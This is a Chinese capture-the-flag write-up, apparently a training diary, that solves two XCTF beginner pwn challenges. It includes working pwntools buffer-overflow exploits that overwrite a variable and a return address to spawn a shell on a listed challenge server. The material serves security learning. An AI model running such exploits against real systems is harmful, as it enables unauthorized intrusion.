day-6 xctf-hello_pwn

xctf-hello_pwn

题目传送门:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5052

又是一个溢出,和昨天的有异曲同工之处:

day-6 xctf-hello_pwn_第1张图片

 

 

 

 

 

 差4个字节,溢出改变dword_60106C的值为nuaa(注意:这里为小端存储,要写为'aaun')

exp:

from pwn import *



#cnn = process('./hello_pwn')

cnn = remote('111.198.29.45',32280)



payload = 'a'*4+'aaun'



cnn.recvuntil('bof')



cnn.send(payload)


print(cnn.recv())


cnn.interactive()
exp

 

总结:注意小端 ~~~~~~注意小端 ~~~~~注意小端~~~~~

 

xctf-level0

题目传送门:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5053

拖进ida后,F5查看,发现就是输出Hello world,然后执行函数vulnerable_function(),跟进:

day-6 xctf-hello_pwn_第2张图片

 

找到一个read,buf长度为80。长度超出80以后,会实现地址随便跳转。

 day-6 xctf-hello_pwn_第3张图片

汇编查看一下。可以发现,在read时,将函数的返回地址覆盖为callsystem的地址,则可以实现漏洞利用。

 day-6 xctf-hello_pwn_第4张图片

 

针对leave指令,可以知道:Leave的作用相当==mov esp,ebp和pop ebp

retn == pop eip,所以后面得再加上4*2=8个字符的leave指令,再覆盖retn pop的eip

所以构造:payload = 'a'*80+'a'*8+(callsystem的地址),其中callsystem的地址为0x400596:

day-6 xctf-hello_pwn_第5张图片

 

 

所以可以得到exp:

from pwn import *

#cnn = process('./level0')
cnn = remote('111.198.29.45',35563)

payload = 'a'*0x88+p64(0x400596)

cnn.sendline(payload)

cnn.interactive()
exp

得到shell,然后ls查看,cat flag命令得到flag:

day-6 xctf-hello_pwn_第6张图片

 

 

总结:

enter指令:
push  ebp # 将ebp压栈
mov  ebp esp # 将%esp保存到%ebp, 这两步是函数的标准开头

leave指令
leave等效于以下汇编指令:
mov   esp,ebp
pop ebp

call指令
call foo(foo是一个标号)等效于以下汇编指令:
push eip
mov  eip , foo

ret指令
ret等效于以下汇编指令:
pop  eip

 

转载于:https://www.cnblogs.com/yidianhan/p/11590650.html

你可能感兴趣的:(day-6 xctf-hello_pwn)